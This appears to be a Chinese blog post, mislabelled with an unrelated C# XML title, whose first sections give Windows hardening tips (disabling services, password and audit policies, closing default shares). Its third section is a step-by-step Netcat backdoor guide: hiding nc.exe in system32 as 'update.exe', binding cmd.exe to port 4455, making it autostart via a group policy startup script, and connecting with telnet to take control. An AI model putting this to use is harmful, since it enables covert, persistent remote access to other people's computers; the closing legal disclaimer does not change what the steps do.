C# XML创建和解析

一、安装步骤

1、拔出网线

2、安装Windows及驱动程序

3、安装杀毒软件及防火墙

4、连接网线,升级病毒库及Windows补丁

5、安装常用工具及软件

6、优化

 

二、Windows优化

1、禁用不必要的服务

Application Management  组策略部署软件

Certificate Propagation  为智能卡提供证书

DFS Replication  分布式文件系统

[DHCP Client  自动获取IP]

Diagnostic Policy Service  诊断服务(系列)

Distributed Link Tracking     Client NTFS文件系统连接

Fax   传真服务

Human Interface Device Access 智能手柄或笔记本快捷键

Microsoft iSCSI Initiator Service  iSCSI设备服务

Net.Msmq  侦听器适配器

Net.Pipe  侦听器适配器

Offline Files  脱机文件服务

[Parental Controls  家长服务]

PnP-X IP Bus Enumerator  即插即用扩展(网络冰箱等)

 

2、采用一些第三方软件

推荐使用金山卫士,Windows优化大师等

360性能卓越,但是非常卡

 

3、组策略配置【能够实现的功能非常多是Windows,系统中最重要的安全管理工具,需要仔细研究】

 

密码策略

1gpedit.msc启动本地组策略

计算机配置-windows设置-安全策略-账户策略

2) 密码策略

3) 账户锁定策略

 

【附】密码原则:

复杂性 【最小8位】

易记忆性 【密码最好是一句对自己有意义的话】

时效性 【一般不要超过三个月,最长不要超过半年!】

如:

飞流直下三千尺 Flzxsqcfl2x3_QC

【万一需要把密码保存下来要用gpg加密工具 【Linux  下 pgp】】

 

    审核策略

(1)计算机配置-windows设置-安全策略-本地策略

     审核策略【比较重要的选项】

审核账户登录  (本地账户登录)一旦登录系统,就会记录到时间查看器中

审核登录 (域账户登录)

审核策略更改

审核系统事件 (系统关机、重启或发生安全事件)

 

4、关闭默认共享

如果是默认共享的话,在局域网中,只要在另一台电脑上,开始菜单,键入

\\IP地址\盘符【如:c:】就可以直接访问到本地电脑上的文件内容

 

5、禁用guest账户

 

6、修改管理员用户名

 

三、Netcat后门工具

Netcatwindows中最常见的后门工具【首先需要拿到这台计算机的控制权限】

 

1、下载后把nc.exe拷贝的任意位置,找个不容易发现,普通用户不敢动的位置藏起来。如:c:\windows\system32中,并改个不容易发现的名字如update.exe

2、在被攻击端执行

3、C:\windwos\system32\update.exe p  4455  d  -e  cmd.exe

-p  指定nc映射到4455端口 【netstat -a查看系统中所有已经开启的端口】

-L  开启后持续允许访问

-d  允许命令行关闭

-e  映射到cmd程序

4、在被攻击端保证update.exe开机自启动,最好使用组策略

1)将该命令写入一个脚本

2gpedit.msc启动本地组策略

计算机配置-windows设置-脚本启动-启动

导入脚本

5、攻击人员只要使用命令

telnet  被攻击端ip地址  4455

连接4455端口时,就可以获得被攻击服务器的权限

Win7telnet命令需要手工开启】

 

Netcat工具包保存在我的资源文件中,感兴趣的读者敬请下载】

附:这篇笔记介绍的网络后门工具纯出于兴趣,希望读者千万不要拿别人的计算机进行尝试,否则是要承担一定法律后果的额,一定要遵守相关法律,希望大家理解,谢谢!

C# XML创建和解析

上一篇:[Leetcode]--Path Sum


下一篇:iframe跨域与session失效问题